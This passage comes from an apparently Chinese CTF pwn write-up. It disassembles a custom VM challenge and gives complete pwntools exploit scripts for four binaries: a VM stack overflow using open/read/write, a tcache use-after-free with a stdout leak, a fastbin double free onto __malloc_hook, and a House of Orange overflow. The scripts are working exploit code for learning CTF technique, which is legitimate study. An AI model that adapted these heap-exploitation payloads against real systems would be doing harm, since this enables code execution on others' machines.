  0x20, 0x5F, 0x20, 0x20, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x20,
  0x7C, 0x20, 0x33, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x11, 0x7C, 0x20, 0x7C, 0x20, 0x7C, 0x20, 0x20, 0x20,
  0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11,
  0x20, 0x20, 0x20, 0x20, 0x7C, 0x20, 0x7C, 0x20, 0x33, 0x18,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20,
  0x7C, 0x20, 0x20, 0x5F, 0x5F, 0x7C, 0x33, 0x20, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20,
  0x20, 0x20, 0x20, 0x7C, 0x33, 0x28, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x11, 0x20, 0x7C, 0x20, 0x2F, 0x20, 0x2F,
  0x20, 0x20, 0x33, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x11, 0x20, 0x20, 0x20, 0x2F, 0x20, 0x2F, 0x20, 0x7C,
  0x33, 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11,
  0x5F, 0x5F, 0x2F, 0x20, 0x7C, 0x20, 0x7C, 0x0A, 0x33, 0x40,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x52, 0x11, 0x01,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x48, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F, 0x01, 0x11, 0x7C,
  0x20, 0x7C, 0x5F, 0x7C, 0x20, 0x7C, 0x20, 0x33, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x2F, 0x20,
  0x2F, 0x20, 0x20, 0x7C, 0x20, 0x33, 0x08, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x11, 0x7C, 0x20, 0x7C, 0x20, 0x7C,
  0x5F, 0x5F, 0x5F, 0x33, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x7C, 0x20, 0x7C,
  0x20, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x11, 0x20, 0x20, 0x7C, 0x20, 0x7C, 0x20, 0x20, 0x20, 0x33,
  0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20,
  0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7C, 0x33, 0x28, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x7C, 0x2F,
  0x20, 0x2F, 0x20, 0x20, 0x20, 0x33, 0x30, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x2F, 0x20, 0x2F,
  0x20, 0x20, 0x20, 0x33, 0x38, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x7C, 0x20, 0x7C,
  0x0A, 0x33, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44,
  0x52, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x13, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8F,
  0x01, 0x11, 0x5C, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x2F, 0x20,
  0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11,
  0x2F, 0x5F, 0x2F, 0x20, 0x20, 0x20, 0x7C, 0x5F, 0x33, 0x08,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x7C, 0x20,
  0x5C, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x33, 0x10, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x7C, 0x20, 0x20, 0x20,
  0x7C, 0x5F, 0x7C, 0x20, 0x33, 0x18, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x7C, 0x5F, 0x7C, 0x20,
  0x20, 0x20, 0x33, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x11, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7C,
  0x33, 0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11,
  0x5F, 0x5F, 0x5F, 0x2F, 0x20, 0x20, 0x20, 0x20, 0x33, 0x30,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x2F,
  0x5F, 0x2F, 0x20, 0x20, 0x20, 0x20, 0x33, 0x38, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x20, 0x20, 0x20, 0x20,
  0x7C, 0x5F, 0x7C, 0x0A, 0x33, 0x40, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x44, 0x52, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x13, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x8F, 0x01, 0x88, 0xD2, 0xF7, 0xFF, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

接下来该写出汇编逻辑了

// Hand-written disassembly of the dumped code segment (ida_chars above), in
// the author's mnemonics: a0/a1/a2 are the VM registers the opcode table
// calls rax/rbx/rcx, sp is the VM stack pointer and buf the 0x1000-byte data
// area. "syscall N" is SYSCALL (0x8F) with table index N; "pop256" is
// ADD_RSP_I 0x100, undoing the "sub rsp,0x100" at the entry of this routine,
// and "ret" is LEAVE (0x90). The first jmp skips this body; the dump ends
// with a CALL_NEAR carrying a negative displacement, which presumably calls
// back into it — confirm against the bytes.
jmp 0x3a5 // JMP_NEAR +0x3a5 (bytes 0x7E 0xA5 0x03)
sub rsp,0x100 // key point
mov a0, 0x2323232323232323
mov [buf+0x0],a0
mov a0, 0x2323232323232323
mov [buf+0x8],a0
mov a0, 0x2323232323232323
mov [buf+0x10],a0
mov a0, 0x2323232323232323
mov [buf+0x18],a0
mov a0, 0x2323232323232323
mov [buf+0x20],a0
mov a0,0xa
mov [buf+0x28],a0
mov a0,[buf+0x0] // note: loads the data, not its address (the later banner blocks use lea)
push a0
pop a1
mov a0,1
mov a2, 0x29
syscall 1 //write
mov a0, 0x2020202020202023
mov [buf+0x0],a0
mov a0, 0x6d6f636c65772020
mov [buf+0x8],a0
mov a0, 0x323032206f742065
mov [buf+0x10],a0
mov a0, 0x2046544341472030
mov [buf+0x18],a0
mov a0, 0x2320202020202020
mov [buf+0x20],a0
mov a0, 0xa
mov [buf+0x28],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x29
syscall 1 //write
mov a0, 0x7369687420202023
mov [buf+0x0],a0
mov a0, 0x656d206120736920
mov [buf+0x8],a0
mov a0, 0x7266206567617373
mov [buf+0x10],a0
mov a0, 0x616d206d76206d6f
mov [buf+0x18],a0
mov a0, 0x232020656e696863
mov [buf+0x20],a0
mov a0, 0xa
mov [buf+0x28],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x29
syscall 1 //write
mov a0, 0x2323232323232323
mov [buf+0x0],a0
mov a0, 0x2323232323232323
mov [buf+0x8],a0
mov a0, 0x2323232323232323
mov [buf+0x10],a0
mov a0, 0x2323232323232323
mov [buf+0x18],a0
mov a0, 0x2323232323232323
mov [buf+0x20],a0
mov a0, 0xa
mov [buf+0x28],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x29
syscall 1 //write
mov a0, 0x656d206c6c657423
mov [buf+0x0],a0
mov a0, 0x7369207461687720
mov [buf+0x8],a0
mov a0, 0x616e2072756f7920
mov [buf+0x10],a0
mov a0, 0x3a656d
mov [buf+0x18],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x1b
syscall 1 //write
mov a0, sp
push a0
pop a1
mov a0, 0x0
mov a2, 0x1000 // read length exceeds the 0x100 bytes reserved by "sub rsp,0x100" above
syscall 0 //read
mov a0, sp
syscall 2 //puts
mov a0, 0x20746168772c6b6f
mov [buf+0x0],a0
mov a0, 0x7720756f79206f64
mov [buf+0x8],a0
mov a0, 0x73206f7420746e61
mov [buf+0x10],a0
mov a0, 0x3a7961
mov [buf+0x18],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x1b
syscall 1 //write
mov a0, sp
push a0
pop a1
mov a0, 0x0
mov a2, 0x1000
syscall 0 //read
mov a0, 0x657220492c776f4e
mov [buf+0x0],a0
mov a0, 0x6f79206569766563
mov [buf+0x8],a0
mov a0, 0x617373656d207275
mov [buf+0x10],a0
mov a0, 0xa7e6579622c6567
mov [buf+0x18],a0
lea a0,[buf+0x0]
push a0
pop a1
mov a0, 0x1
mov a2, 0x20
syscall 1 //write
pop256 // ADD_RSP_I 0x100
ret // LEAVE (0x90)

好了,要开始pwn的部分了

要注意这里的call,保存指针不是常规意义上的“压栈”,它rsp是增加的(同理ret的rsp是减的)

read 0x1000明显栈溢出,通过调试,理清楚结构

此时是系统调用write之前,

在此之前会有一个push操作,内容是[buf+0x00]

看一下栈情况

image-20200920185428434

可以看到多了一块地址,是指向内存数据区的,所以可以泄露出heap_base

由于程序开了沙盒所以要用orw

写出syscall的函数即可。

需要注意的点:

image-20200925220738694

其实系统调用也是虚拟系统调用,在这里,分别为0,1,2,3

构造调用函数时也并非常规意义的syscall,要理解虚拟指令集来自己构造

exp

from pwn import *
#io=remote('124.70.153.199',8666)
# Exploit harness for the vmpwn VM analysed above. Written for Python 2
# pwntools (str payloads concatenated with recv() data, iterator .next()).
io = process('./vmpwn')
libc=ELF('libc-2.23.so')
#context.log_level = 'debug'
io.recv()
pay='a'*0x100
io.send(pay)
io.recvuntil('a'*0x100)
elf_base=u64(io.recv(6)+'\x00\x00')-0x203851#leak elf_base
pay='b'*0xf0 + 'd'*0x10 + p64(elf_base+0x203020)#ret ip
io.send(pay)
io.recvuntil('tell me what is your name:')
pay='a'*0xf0
io.send(pay)
io.recvuntil('a'*0xf0)
heap_base=u64(io.recv(6)+'\x00\x00')#leak heap_base
success('heap_base:'+hex(heap_base))
# pause()
def call(a,b,c,ord):#def virtual syscall
    """Encode one virtual "syscall" as VM bytecode.

    Emits MOV_RAX_I a, MOV_RBX_I b, MOV_RCX_I c (opcodes 0x11/0x12/0x13, each
    with an 8-byte immediate) followed by SYSCALL (0x8f) and its 1-byte table
    index ``ord``.  Only ``ord`` 0, 1 and 2 get an index byte; any other value
    leaves SYSCALL without its operand (the ``ord == 3`` sequence is built by
    hand further down).  ``ord`` shadows the builtin of the same name.
    """
    pay1='\x11'
    pay1+=p64(a)
    pay1+='\x12'
    pay1+=p64(b)
    pay1+='\x13'
    pay1+=p64(c)
    pay1+='\x8f'
    if ord==0:
        pay1+='\x00'
    if ord==1:
        pay1+='\x01'
    if ord==2:
        pay1+='\x02'
    return pay1

# Remaining stages of the exploit described in the prose above; the comments
# are the author's.
pay2=call(1,elf_base+0x2038E0,0x8,1)# wrr # sys_read
pay2+=call(0,elf_base+0x2038f8,0x8,0)# sys_free
pay2+=call(0,heap_base+0x2D18+0x110+87,0x1000,0)
pay=''
pay=pay.ljust(0x100,'\x00')+p64(heap_base+0x2D18+0x110)+'\x00'*8
pay+=pay2
io.send(pay)
libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['read']
libc.address=libc_base #leak libc_base
system_addr=libc.sym['system']
bin_sh_addr=libc.search('/bin/sh\x00').next()
io.send(p64(libc.sym['open']))
pay=''
pay+='\x11flag\x00\x00\x00\x00'
pay+='\x33'+'\x00'*8
pay+='\x20'+'\x00'*8
pay+='\x12'
pay+=p64(0)
pay+='\x13'
pay+=p64(0)
pay+='\x8f'
pay+='\x03'#free -> open
pay+=call(3,heap_base+0x2D18,0x30,0)#orw
pay+=call(1,heap_base+0x2D18,0x30,1)
pay+=call(0,heap_base+0x2D18,0x1000,0)+'\xff'
io.send(pay)
success('libc_base:'+hex(libc_base))
success('heap_base:'+hex(heap_base))
success('elf_base:'+hex(elf_base))
io.interactive()

在本地写个flag文件,成功~

image-20200925225109306

0x02 钓鱼城杯 veryeasy

第一次做glibc2.27,多了个tcache机制以及IOfile的利用,所以,,又得去学了

直接去撸源码

有一个坑点是Ubuntu尽量不要点升级,不知什么时候我的18.4已不是18.4了升到了19,所以tcache完善之后总是打不通,没办法恢复到了之前的快照才得以完成这道题

看下程序

image-20200927004436835

先申请十个堆块绕过检查

接着就是tcache的uaf漏洞,1/16概率

思路:

绕过if检查之后,free掉7个填满tcache,第八个会放入unsortedbin,修改fd为stdout1/16的概率,之后把stdout malloc出来改写一下就可以leak信息。获得libc基址后就可以算malloc_hook的地址。不过这题不能直接向malloc_hook中写入one_gadget,得利用realloc函数做中转来满足one_gadget的条件。

exp

注释掉的一部分是网上的原exp,但有些麻烦可以不采用,原理大概就是先申请到stdin的地址爆破出低第四位的地址,然后再修改到stdout处。

这里改一下直接改写stdout

#!/usr/bin/python
#-*-coding:utf8-*-
from pwn import *
libc = ELF('./libc-2.27.so')  # target libc; its symbol offsets are used once the base is leaked
#context.log_level = 'debug'
def Add(index, size, content, p):
    """Menu option 1 on connection ``p``: create entry ``index`` of ``size`` bytes holding ``content``."""
    p.sendlineafter('Your choice :', '1')
    p.sendlineafter('id:', str(index))
    p.sendlineafter('size:', str(size))
    p.sendafter('content:', content)

def Edit(index, content, p):
    """Menu option 2 on connection ``p``: overwrite entry ``index`` with ``content``."""
    p.sendlineafter('Your choice :', '2')
    p.sendlineafter('id:', str(index))
    p.sendafter('content:', content)

def Delete(index, p):
    """Menu option 3 on connection ``p``: delete entry ``index``."""
    p.sendlineafter('Your choice :', '3')
    p.sendlineafter('id:', str(index))

def pwn():
    """Run one attempt against ./veryeasy.

    Returns 1 after handing the connection to the user, 0 when the leak did
    not land (the 1/16 guess discussed in the prose) so that ``__main__`` can
    retry with a fresh process.
    """
    p = process('./veryeasy')
    Add(0, 0x80, 'A'*0x10, p)
    Add(1, 0x80, 'A'*0x10, p)
    Add(2, 0x80, 'A'*0x10, p)
    Add(3, 0x80, 'A'*0x10, p)
    Add(4, 0x80, 'A'*0x10, p)
    Add(5, 0x80, 'A'*0x10, p)
    Add(6, 0x80, 'A'*0x10, p)
    Add(7, 0x80, 'A'*0x10, p)
    Add(8, 0x80, 'A'*0x10, p)
    Add(9, 0x80, 'A'*0x10, p)
    Delete(0, p)
    Delete(1, p)
    Delete(2, p)
    Delete(3, p)
    Delete(4, p)
    Delete(5, p)
    Delete(0, p)
    Delete(0, p)
    # The commented-out lines below are the original exploit found online,
    # kept for reference (see the prose above).
    #Edit(0, '\x88\xfa', p)
    #Add(10, 0x80, 'A'*0x10, p)#0
    #Add(11, 0x80, 'A'*0x10, p)#fa88 ->try 1/16
    #tcache: fa88(fd)->x8d0
    #Delete(2, p)# 2->x8d0
    # overwrite the fd pointer so that it points at stdout
    #Edit(2, '\x60\x07', p)
    #Add(12, 0x80, 'A'*0x10, p)
    Edit(0,'\x60\x07',p)
    Add(10,0x80,'A'*0x10,p)
    try:#_IO_2_1_stdout_
        Add(11, 0x80, p64(0xfbad1800) + p64(0)*3 + '\x00', p)
        # key point; read the glibc source to understand it
        # NOTE(review): gdb.attach() is still active here, so every retry of the
        # 1/16 loop attaches a debugger — probably a leftover from debugging.
        gdb.attach(p)
        libc_base = u64(p.recvuntil('\x7f')[-6:] + '\x00\x00') - 0x3ed8b0
        info("libc_base ==> " + hex(libc_base))
        libc.address = libc_base
    except:  # bare except: also swallows KeyboardInterrupt while retrying
        p.close()
        return 0
    if (libc_base >> 40) != 0x7f:  # sanity check on the leaked address
        return 0

    malloc_hook = libc.symbols['__malloc_hook']
    info("malloc_hook ==> " + hex(malloc_hook))
    realloc = libc.symbols['__libc_realloc']
    malloc = libc.symbols['__libc_malloc']
    a = [0x4f365, 0x4f3c2, 0x10a45c]
    one_gadget = libc_base + a[2]

    Delete(0, p)
    Edit(0, p64(malloc_hook-0x8), p)
    Add(14, 0x80, 'A'*0x10, p)
    Add(15, 0x80,p64(one_gadget) + p64(realloc+0x6), p)
    p.sendlineafter('Your choice :', '1')
    p.sendlineafter('id:', '16')
    p.sendlineafter('size:', str(0x80))
    p.interactive()
    p.close()
    return 1

if __name__ == '__main__':
    # Retry until pwn() reports success (it returns 0 when the guess fails).
    while True:
        a = pwn()
        if a:
            break

reference:

IOFILE泄露libc

0x03 CUMTCTF2020 babyheap

这是很早做过的题稍微改了改放在了校赛

先查看一下保护,可改写got表。UAF+Double free

add函数

每次add都会malloc了两个堆:

s相当于指针数组,分别存放标志位、buf指针、message;

buf存放game message

// Decompiled "add" handler of babyheap (IDA pseudocode, kept verbatim).
// Each call allocates two chunks: a 0x28-byte record s (in-use flag at +0,
// pointer to the name chunk at +8, message at +16) and buf of the requested size.
int add()
{
  size_t size; // [rsp+0h] [rbp-20h]
  void *s; // [rsp+8h] [rbp-18h]
  void *buf; // [rsp+10h] [rbp-10h]
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u); // stack-protector canary (fs:0x28)
  s = 0LL;
  buf = 0LL;
  LODWORD(size) = 0; // low dword: requested size; the high dword is reused as the loop index below
  if ( (unsigned int)count > 9 ) // at most 10 records
    return puts("Too much!!!");
  s = malloc(0x28uLL); // NOTE(review): not NULL-checked (buf below is)
  memset(s, 0, 0x28uLL);
  puts("size of the game's name: ");
  if ( (unsigned int)__isoc99_scanf("%u", &size) == -1 ) // only EOF is rejected; non-numeric input leaves size at 0
    exit(-1);
  buf = malloc((unsigned int)size);
  if ( !buf )
  {
    puts("Error !!");
    exit(-1);
  }
  puts("game's name:");
  read(0, buf, (unsigned int)size); // bounded by the allocation size; return value unchecked
  *((_QWORD *)s + 1) = buf; // s+8: pointer to the name chunk
  puts("game's message:");
  __isoc99_scanf("%23s", (char *)s + 16); // up to 23 chars + NUL at s+16, exactly filling the 0x28-byte record
  *(_DWORD *)s = 1; // s+0: in-use flag
  for ( HIDWORD(size) = 0; HIDWORD(size) <= 9; ++HIDWORD(size) ) // store s in the first free list slot
  {
    if ( !list[HIDWORD(size)] )
    {
      list[HIDWORD(size)] = s;
      break;
    }
  }
  ++count;
  return puts("Added!");
}

delete函数,存在uaf漏洞,

// Decompiled "delete" handler of babyheap (IDA pseudocode, kept verbatim).
int del()
{
  int result; // eax
  unsigned int v1; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u); // stack-protector canary (fs:0x28)
  if ( !count )
    return puts("Null!");
  puts("game's index:");
  __isoc99_scanf("%d", &v1); // return value unchecked: on non-numeric input v1 stays uninitialized
  if ( v1 <= 9 && list[v1] )
  {
    *list[v1] = 0; // clears the in-use flag only ...
    // ... and frees the name chunk, but neither list[v1] nor the stored name
    // pointer is cleared and count is not decremented, so the same slot passes
    // this check again — the use-after-free / double free the page describes.
    // Mitigation: NULL the stored pointer and the list slot after free().
    free(*((void **)list[v1] + 1));
    result = puts("Deleted!");
  }
  else
  {
    puts("index error!");
    result = 0;
  }
  return result;
}

泄露main_arena+88的地址,从而计算libc基址,使用doublefree从而改写malloc_hook的地址,getshell。

exp

from pwn import*
context.log_level = 'debug'  # pwntools: echo all traffic with the target
def menu(ch):
    """Answer the menu prompt of the global connection ``p`` with choice ``ch``."""
    p.sendlineafter('choice :',str(ch))
def new(size,name,content):
    """Menu option 1 (add): request ``size`` bytes, then send the name and the message.

    The size is sent after the "size of the game's name:" prompt (matched by
    its "game's name:" suffix), the name after the second "game's name:" prompt.
    """
    menu(1)
    p.sendlineafter("game's name:",str(size))
    p.sendafter("game's name:",name)
    p.sendlineafter("game's message:",content)
def free(index):
    """Menu option 3 (delete) for entry ``index``."""
    menu(3)
    p.sendlineafter('index:',str(index))
def show():
    """Menu option 2 (show); the caller reads the output itself."""
    menu(2)
# Exploit body for babyheap as described in the prose above (Python 2: print
# statement, str payloads). Comments are the author's.
p = process('./babyheap')
libc = ELF('./libc-2.23.so')
new(0x100,'1111','1111')
new(0x68,'1111','1111')
new(0x68,'1111','1111')
free(0)#unsortedbin
new(0xD0,'\x78','\x78')
show()
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x68
log.info('libc:\t' + hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']
print hex(malloc_hook)
og = libc_base + 0xf1207
realloc = libc_base + libc.sym['realloc']
free(1)
free(2)
free(1)
new(0x68,p64(malloc_hook - 0x23),'2222')
new(0x68,'ld1ng','ld1ng')
new(0x68,'ld1ng','ld1ng')
new(0x68,'\x00'*(0x13-8) + p64(og) + p64(realloc + 4),'ld1ng')
menu(1)
p.interactive()

0x04 ciscn2020 pwn2

一道国赛题,pwnht学长赛后给我发了exp,今天才想起来看一下,不过学长有些地方写的不是很懂,所以根据思路改了改,现在起码自己能看懂了。

题目叫heap_stack,本以为会和栈有关其实不然

image-20200929161614624

像普通堆题一样,push和puuuuush相当于add,pop是增加可push的次数,show就是show

漏洞存在于push函数中,存在堆溢出

// Decompiled "push" handler of heap_stack (IDA pseudocode, kept verbatim).
// The allocation uses the size masked to 12 bits while the read uses the
// unmasked value — the heap overflow the page describes.
unsigned __int64 push()
{
  __int64 nbytes; // ST00_8
  size_t size; // ST08_8
  void *buf; // ST10_8
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u); // stack-protector canary (fs:0x28)
  if ( num <= 9 ) // at most 10 entries in ptr[]
  {
    puts("size?");
    nbytes = sub_B49(); // reads the user-supplied size; body not shown on the page
    size = nbytes & 0xFFF; // allocation keeps only the low 12 bits (three hex digits)
    buf = malloc(size); // NOTE(review): return value not NULL-checked
    puts("content?");
    read(0, buf, nbytes); // read length is the unmasked value, so it is not bounded by the allocation
    printf("Malloc at %p.\n", buf, nbytes, size); // prints the chunk address; the extra arguments are a decompiler artifact
    ptr[num++] = buf;
  }
  return __readfsqword(0x28u) ^ v4;
}

起码找到漏洞后在fix阶段还是有帮助的

利用方式为House of Orange,泄露出libc,利用puuuush可以申请大堆块的特点,将堆块申请到malloc_hook处,修改为one_gadget之后触发漏洞即可。

exp

#!/usr/bin/env python
from pwn import *
#context.log_level='debug'
def uu64(data):
    """Unpack up to 8 leaked bytes as a little-endian u64, logging the value.

    ``data`` is right-padded with NUL bytes to 8 bytes before unpacking.
    """
    padded = data.ljust(8, b'\x00')
    value = u64(padded)
    log.success("%#x" % value)
    return value
def add(size,text):
    """Menu option 1 (push) on the global connection ``io``: request ``size`` bytes and send ``text``."""
    io.sendlineafter(">",str(1))
    io.sendlineafter("?",str(size))
    io.sendafter("?",text)
def add2(size,text):
    """Menu option 2 (puuuush) on the global connection ``io``: same protocol as add()."""
    io.sendlineafter(">",str(2))
    io.sendlineafter("?",str(size))
    io.sendafter("?",text)
# Exploit body for heap_stack as described in the prose above; the inline
# comments are the author's (translated).
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
io=process('./heap_stack')
add(0x1018,p64(0x20)+p64(0xfe1)+p64(0x20)+p64(0x0fe1))# change the top chunk size
add(0xfff,'bbb')#HOO,unsortedbin
add(0xfb0,p8(0x78))
io.sendlineafter(">",str(4))#show
io.recv()
libc_addr=uu64(io.recv(6))
a= [0x45226,0x4527a,0xf0364,0xf1207]
libc_base=libc_addr-0x68-libc.sym['__malloc_hook']
#print hex(libc.sym['__malloc_hook'])
malloc_hook=libc_base+libc.sym['__malloc_hook']
one_gadget=libc_base+a[3]
print("libc_base="+hex(libc_base))
add(0xfe0-0x90-0x10,'a')

add(0x1000,'a'*0x10+p64(0x20)+p64(0xFFFFFFFFFFFFFfe1))# change the top chunk
io.recvuntil("Malloc at ")
heap_addr=int(io.recv(14),16)
offset=malloc_hook-(heap_addr+0x30)
add2(offset,'a')
add(0x20,p64(one_gadget))
# io.recvuntil('>',str(3))
# add(0x30,'a')
pause()
io.interactive()

临近下课终于成功了,,okok

image-20200929163303056

0x06 小结

还有一个题网上资料也比较少,十一补